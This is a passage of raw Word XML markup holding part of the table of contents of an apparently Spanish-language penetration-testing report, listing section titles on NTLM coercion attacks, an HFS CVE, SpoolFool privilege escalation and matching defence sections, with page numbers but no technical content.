            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Conclusión -&gt;</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575982 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>108</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57A71F91" w14:textId="6F334562" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575983" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.Pruebas de concepto POC</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575983 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>112</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4172D651" w14:textId="47FDDCE4" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575984" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Robo de credenciales de red, Envenenamiento LLMNR-NBT-NS:</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575984 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>112</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D94B6B1" w14:textId="7E0CBFD8" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575985" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Defensa -&gt;</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575985 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>124</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D319943" w14:textId="6C64C035" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575986" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Coerce (MS-DFSNM):</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575986 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>129</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="72D18E02" w14:textId="7F0F8B66" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575987" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Defensa -&gt;</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575987 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>141</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6C41C781" w14:textId="5B572916" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575988" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Petitpotam (</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>MS-EFSRPC</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>):</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575988 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>145</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="328F858B" w14:textId="5ED77204" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575989" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Defensa -&gt;</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575989 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>163</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4702EBB4" w14:textId="5EF56F26" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575990" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <w:t>Servidor de archivos HTTP Rejetto (HFS) 2.3 (</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CVE-2014-6287CVE-2014-6287</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <w:t>):</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575990 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>172</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="561939CC" w14:textId="1E198945" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575991" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Defensa -&gt;</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575991 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>187</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20CB260C" w14:textId="69CB761B" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575992" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Defensa General de Coerce y PetitPotam Mitigación de ataques NTLM:</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575992 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>189</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C7F5328" w14:textId="754949A2" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575993" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Defensa General:</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575993 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>201</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2BA5F33C" w14:textId="0A2BEBCD" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575994" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.Post-Explotación:</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575994 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>202</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18710623" w14:textId="26E9F1F2" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575995" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CVE-2022-21999 SpoolFool Privesc:</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575995 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>202</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43052F2D" w14:textId="0F1C00D5" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575996" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Persistencia -&gt;</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575996 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>222</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
